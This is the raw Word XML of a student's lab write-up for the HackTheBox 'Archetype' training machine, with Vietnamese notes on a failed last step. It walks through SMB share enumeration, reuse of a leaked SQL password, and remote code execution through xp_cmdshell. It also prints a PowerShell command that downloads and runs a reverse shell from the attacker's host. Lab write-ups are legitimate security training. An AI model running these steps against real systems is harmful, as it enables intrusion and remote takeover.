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4BAFED" w14:textId="78B3A3B6" w:rsidR="00981538" w:rsidRDefault="00E25E70">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25E70">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">QuanLTMSE61880 – LAB </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="009F18D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:sz w:val="32"/>
          </w:rPr>
          <w:t>http://hackthebox.eu/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A3A8F7E" w14:textId="1E9C7501" w:rsidR="00E25E70" w:rsidRDefault="00E25E70">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734172D0" w14:textId="58556706" w:rsidR="00E25E70" w:rsidRDefault="00E25E70">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Connect</w:t>
      </w:r>
      <w:r w:rsidR="00263D3E">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LAB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> HackTheBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9532EB" w14:textId="5F5E3E33" w:rsidR="001A63A6" w:rsidRDefault="001A63A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Link Lab: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="009F18D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://app.hackthebox.eu/starting-point</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D850F62" w14:textId="04780FDF" w:rsidR="00263D3E" w:rsidRDefault="00263D3E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Click “CONNECT TO HTB” =&gt; </w:t>
      </w:r>
      <w:r w:rsidR="007229D0">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>“Starting Point” =&gt; Open VPN= &gt; Click to download “Download VPN”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FDB33" w14:textId="0944FE3D" w:rsidR="00263D3E" w:rsidRDefault="007229D0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5DF2AD80" wp14:editId="4B52E7F5">
            <wp:extent cx="5936615" cy="320738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A26B4" w14:textId="1BBE6701" w:rsidR="007229D0" w:rsidRDefault="007229D0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0B36B3CF" wp14:editId="76F12251">
            <wp:extent cx="5936615" cy="2715895"/>
            <wp:effectExtent l="0" t="0" r="698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E703B" w14:textId="1DB430BA" w:rsidR="007229D0" w:rsidRDefault="007229D0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7FC7EBBA" wp14:editId="42C96BD6">
            <wp:extent cx="5936615" cy="3322955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E1269" w14:textId="68FB1623" w:rsidR="007229D0" w:rsidRDefault="007229D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038D2AF0" w14:textId="5518F0D1" w:rsidR="007229D0" w:rsidRDefault="007229D0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Step 2: Open terminal and run command : “sudo openvpn nameFileDownload.ovpn”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DB54DF" w14:textId="5D189D2A" w:rsidR="007229D0" w:rsidRDefault="007229D0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30563928" wp14:editId="404974F4">
            <wp:extent cx="5936615" cy="3187065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D9A7D" w14:textId="77777777" w:rsidR="00263D3E" w:rsidRDefault="00263D3E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F8F7A6" w14:textId="661801F5" w:rsidR="001A63A6" w:rsidRDefault="001A63A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42100CDD" w14:textId="77777777" w:rsidR="001A63A6" w:rsidRDefault="001A63A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A1A7D3C" w14:textId="780A80EB" w:rsidR="001A63A6" w:rsidRDefault="001A63A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4600C091" w14:textId="25E844A2" w:rsidR="001A63A6" w:rsidRDefault="001A63A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A9DB90A" w14:textId="63655ADB" w:rsidR="001A63A6" w:rsidRDefault="00C62AB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C62AB8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Starting Point </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00C62AB8">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARCHETYPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E04A67" w14:textId="425B6318" w:rsidR="00C62AB8" w:rsidRDefault="00C62AB8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F559E6" w14:textId="1C52BEB3" w:rsidR="00C62AB8" w:rsidRDefault="00C62AB8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Scan open port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A9B91" w14:textId="3CC36238" w:rsidR="00C62AB8" w:rsidRDefault="00432FC7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2F50BD8B" wp14:editId="6E102435">
            <wp:extent cx="5936615" cy="3207385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BBFE8" w14:textId="281DFEA6" w:rsidR="00432FC7" w:rsidRDefault="00432FC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B705C95" w14:textId="65818128" w:rsidR="00432FC7" w:rsidRDefault="00432FC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Focus into port 445 – File Sharing, we can do in file sharing that have been shared and using command : “smbclient -N -L </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="009F18D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>\\\\10.10.10.27\\”</w:t>
        </w:r>
        <w:r w:rsidRPr="009F18D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:lastRenderedPageBreak/>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="444ADC14" wp14:editId="06E9CEB3">
              <wp:extent cx="5956935" cy="2524760"/>
              <wp:effectExtent l="0" t="0" r="5715" b="889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1"/>
                      <pic:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </pic:cNvPicPr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56935" cy="25247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14:paraId="4DC7E136" w14:textId="52AB5DED" w:rsidR="00432FC7" w:rsidRDefault="00432FC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="133F3015" w14:textId="0A7C05C9" w:rsidR="00432FC7" w:rsidRDefault="00867BC7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:r w:rsidR="005B6674">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>backup</w:t>
      </w:r>
      <w:r w:rsidR="005B6674">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: “smbclient -N </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="009F18D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>\\\\10.10.10.27\\backups”</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52F6B03B" w14:textId="08275BDE" w:rsidR="005B6674" w:rsidRDefault="005B6674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547B71A4" wp14:editId="31E01208">
            <wp:extent cx="5943600" cy="2961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BF8BC" w14:textId="385278FA" w:rsidR="005B6674" w:rsidRDefault="005B6674">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F069FD" w14:textId="41E46654" w:rsidR="00CE2720" w:rsidRDefault="005B6674">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In folder backup, download file name prod.dtsConfig. Command: “get prod.dtsConfig” </w:t>
      </w:r>
      <w:r w:rsidR="00CE2720">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61D74345" wp14:editId="56AB4E6D">
            <wp:extent cx="5943600" cy="36506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671D7" w14:textId="3B047727" w:rsidR="005B6674" w:rsidRDefault="005B6674">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Inside file prod.dtsConfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79485732" w14:textId="7D1B0486" w:rsidR="005B6674" w:rsidRDefault="005B6674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39C0C032" wp14:editId="4D121649">
            <wp:extent cx="5936615" cy="2456815"/>
            <wp:effectExtent l="0" t="0" r="698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986B6" w14:textId="0701BBAD" w:rsidR="00912433" w:rsidRDefault="00912433">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E24A9" w14:textId="0FAC69ED" w:rsidR="00843F75" w:rsidRDefault="00912433">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Download fileName “</w:t>
      </w:r>
      <w:r w:rsidRPr="00912433">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>mssqlclient.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” from: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="009F18D3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
          </w:rPr>
          <w:t>https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05C73BAD" w14:textId="64686AA8" w:rsidR="00843F75" w:rsidRDefault="007C2464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581C7294" wp14:editId="77B73B41">
            <wp:extent cx="5943600" cy="21088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0ACC4" w14:textId="248086BD" w:rsidR="007C2464" w:rsidRDefault="007C2464">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BDC897" w14:textId="446DB872" w:rsidR="007C2464" w:rsidRDefault="007C2464">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2464">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>onnect to the SQL Server with the information in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> prod.dtsConfig – password: </w:t>
      </w:r>
      <w:r w:rsidRPr="007C2464">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>M3g4c0rp123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0608A5" w14:textId="3442A130" w:rsidR="007C2464" w:rsidRDefault="007C2464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4B6B386D" wp14:editId="2EB4396B">
            <wp:extent cx="5936615" cy="297497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73F8" w14:textId="4023E083" w:rsidR="008B49BC" w:rsidRDefault="008B49BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1713BD59" w14:textId="6B53B98D" w:rsidR="008B49BC" w:rsidRDefault="008B49BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B49BC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>xp_cmdshell and do remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662D51FB" w14:textId="0B46F5B8" w:rsidR="008B49BC" w:rsidRDefault="008B49BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008B49BC">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>the PowerShell reverse shell below</w:t>
      </w:r>
      <w:r w:rsidR="00B73E60">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B73E60" w:rsidRPr="00B73E60">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>get a proper shell to further enumerate the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099627DC" w14:textId="387F993A" w:rsidR="008B49BC" w:rsidRDefault="008B49BC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16A72341" wp14:editId="5A9C47E9">
            <wp:extent cx="5943600" cy="32346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5A7BC" w14:textId="308533DC" w:rsidR="00B73E60" w:rsidRDefault="00B73E60" w:rsidP="00B73E60">
      <w:r>
        <w:t xml:space="preserve">Set up a netcat listener on port </w:t>
      </w:r>
      <w:r w:rsidR="00B80870">
        <w:t>8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01233985" w14:textId="123C3017" w:rsidR="00B80870" w:rsidRDefault="00B80870" w:rsidP="00B73E60">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D143947" wp14:editId="5A62900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6E8D" w14:textId="6C15EA56" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6" w:rsidP="00B73E60">
      <w:r w:rsidRPr="00C65AC6">
        <w:lastRenderedPageBreak/>
        <w:t>stand up a mini webserver in order to host the file. We can use Python.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02BDA42B" wp14:editId="33FA2B2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DAF5" w14:textId="77777777" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6" w:rsidP="00B73E60"/>
    <w:p w14:paraId="008093B2" w14:textId="77777777" w:rsidR="00B80870" w:rsidRDefault="00B80870" w:rsidP="00B73E60"/>
    <w:p w14:paraId="17CA87B7" w14:textId="4F571B8D" w:rsidR="008B49BC" w:rsidRDefault="00B80870">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BC8C245" wp14:editId="7136376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24D1" w14:textId="61F13A4D" w:rsidR="00B73E60" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65AC6">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We can now issue the command to download and execute the reverse shell through xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F9BD7" w14:textId="3ABE8DBC" w:rsidR="00B73E60" w:rsidRDefault="00C65AC6" w:rsidP="00C65AC6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65AC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>xp_cmdshell "powershell "IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.14.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>61/home/quan/Downloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00C65AC6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/shell.ps1\");"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A086490" w14:textId="6F06A8E6" w:rsidR="00B80870" w:rsidRDefault="00B80870">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8A6F6C" w14:textId="3B502C7B" w:rsidR="00B80870" w:rsidRDefault="00B80870">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70756B43" wp14:editId="30BF49E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3398" w14:textId="2E12F795" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B0CCCC" w14:textId="7C41B29D" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tới đây em không biết sai ở đâu, đây là tất cả setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9A419" w14:textId="2B78DCF0" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ip máy ảo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B344EE0" wp14:editId="47605D9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A0B4" w14:textId="029E70F0" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135F4DDB" w14:textId="2C8D836B" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Chỉnh file shell theo IP và 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF75E23" w14:textId="17198FB8" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EA9BAC0" wp14:editId="14157AE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FD3E" w14:textId="64931CFE" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vẫn chạy 2 lệnh nc + python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0FDADE" wp14:editId="5E0AFEE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28C4" w14:textId="0FF0F198" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Nhưng có vẻ sai ở câu python vì không thấy respone </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF896A4" w14:textId="2970FB68" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFF8116" wp14:editId="1C64DD8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1989" w14:textId="3986DCB1" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vẫn chạy openVPN</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="188C65FE" wp14:editId="532B271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EBD3" w14:textId="77777777" w:rsidR="00C65AC6" w:rsidRDefault="00C65AC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C65A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A803F0"/>
    <w:rsid w:val="001A63A6"/>
    <w:rsid w:val="00263D3E"/>
    <w:rsid w:val="00432FC7"/>
    <w:rsid w:val="005B6674"/>
    <w:rsid w:val="007229D0"/>
    <w:rsid w:val="007C2464"/>
    <w:rsid w:val="00843F75"/>
    <w:rsid w:val="00867BC7"/>
    <w:rsid w:val="008B49BC"/>
    <w:rsid w:val="00912433"/>
    <w:rsid w:val="00981538"/>
    <w:rsid w:val="00A5390B"/>
    <w:rsid w:val="00A803F0"/>
    <w:rsid w:val="00A96A23"/>
    <w:rsid w:val="00B73E60"/>
    <w:rsid w:val="00B80870"/>
    <w:rsid w:val="00C62AB8"/>
    <w:rsid w:val="00C65AC6"/>
    <w:rsid w:val="00CE2720"/>
    <w:rsid w:val="00E25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BA9A91"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{427E8AF7-BC00-418F-8912-133D0E96A1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25E7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5E70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999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15916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3347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file:///\\\\10.10.10.27\\backups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hyperlink" Target="https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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file:///\\\\10.10.10.27\\" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackthebox.eu/starting-point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hyperlink" Target="http://hackthebox.eu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12</Pages>
  <Words>281</Words>
  <Characters>1604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quân lê</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>quân lê</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-03T14:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-06T08:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>